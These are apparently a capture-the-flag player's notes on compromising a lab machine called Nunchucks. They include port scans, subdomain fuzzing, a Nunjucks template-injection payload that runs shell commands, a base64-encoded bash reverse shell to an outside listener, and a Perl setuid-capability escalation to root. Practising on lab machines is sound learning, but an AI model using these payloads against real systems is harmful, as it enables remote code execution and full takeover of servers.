10.10.11.122
ttl 63

[+]NMAP[+]
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6c:14:6d:bb:74:59:c3:78:2e:48:f5:11:d8:5b:47:21 (RSA)
|   256 a2:f4:2c:42:74:65:a3:7c:26:dd:49:72:23:82:72:71 (ECDSA)
|_  256 e1:8d:44:e7:21:6d:7c:13:2f:ea:3b:83:58:aa:02:b3 (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://nunchucks.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: Nunchucks - Landing Page
| ssl-cert: Subject: commonName=nunchucks.htb/organizationName=Nunchucks-Certificates/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:localhost, DNS:nunchucks.htb
| Not valid before: 2021-08-30T15:42:24
|_Not valid after:  2031-08-28T15:42:24
| tls-nextprotoneg: 
|_  http/1.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


whatweb >> nginx[1.18.0]

[+]ENUMERATION[+]
wfuzz -H "Host: FUZZ.nunchucks.htb" -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --hh 30587 https://nunchucks.htb 
000000081:   200        101 L    259 W      4028 Ch     "store" 


TEMPLATE ENGINES / INJECTIONS 
Nunjucks inspired by Ninja,Twig.

[+]SSTI[+]

Burpsuite >> 
{
"email":"{{7*7}}"
}
response >> {"response":"You will receive updates on the following email address: 49."}

BurpSuite >> 
{
"email":"{{ range.constructor('return global.process.mainModule.require(\"child_process\").execSync(\"cat /home/david/user.txt\")')() }}"
}
response >> {"response":"You will receive updates on the following email address: 6cdeb7f1a50725dfcb5431b2f194ef53\n."}


[+]REVERSHELL[+]
root@omen$ echo 'bash -c "bash -i >& /dev/tcp/10.10.14.51/4444 0>&1"' | base64
YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MS80NDQ0IDA+JjEiCg==

{"email":"{{ range.constructor('return global.process.mainModule.require(\"child_process\").execSync(\"echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MS80NDQ0IDA+JjEiCg== | base64 -d | bash \")')() }}"}


sudo nc -lvnp 4444
david@nunchucks:/var/www/store.nunchucks$ whoami
david


[+]PRIVILAGE ESCALATION[+]  PERL GTFObins 
david@nunchucks:~$ cat user.txt 
6cdeb7f1a50725dfcb5431b2f194ef53

david@nunchucks:/usr/bin$ getcap /usr/bin/perl
/usr/bin/perl = cap_setuid+ep

david@nunchucks:/usr/bin$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'
root

david@nunchucks:/usr/bin$ vi /tmp/a.pl
#!/usr/bin/perl
use POSIX qw(strftime);
use POSIX qw(setuid);
POSIX::setuid(0);

exec "/bin/sh"

david@nunchucks:/tmp$ ./a.pl 
# bash

root@nunchucks:/tmp# whoami
root

root@nunchucks:/tmp# cat /root/root.txt 
c03055d144704c401032622547e8e71a
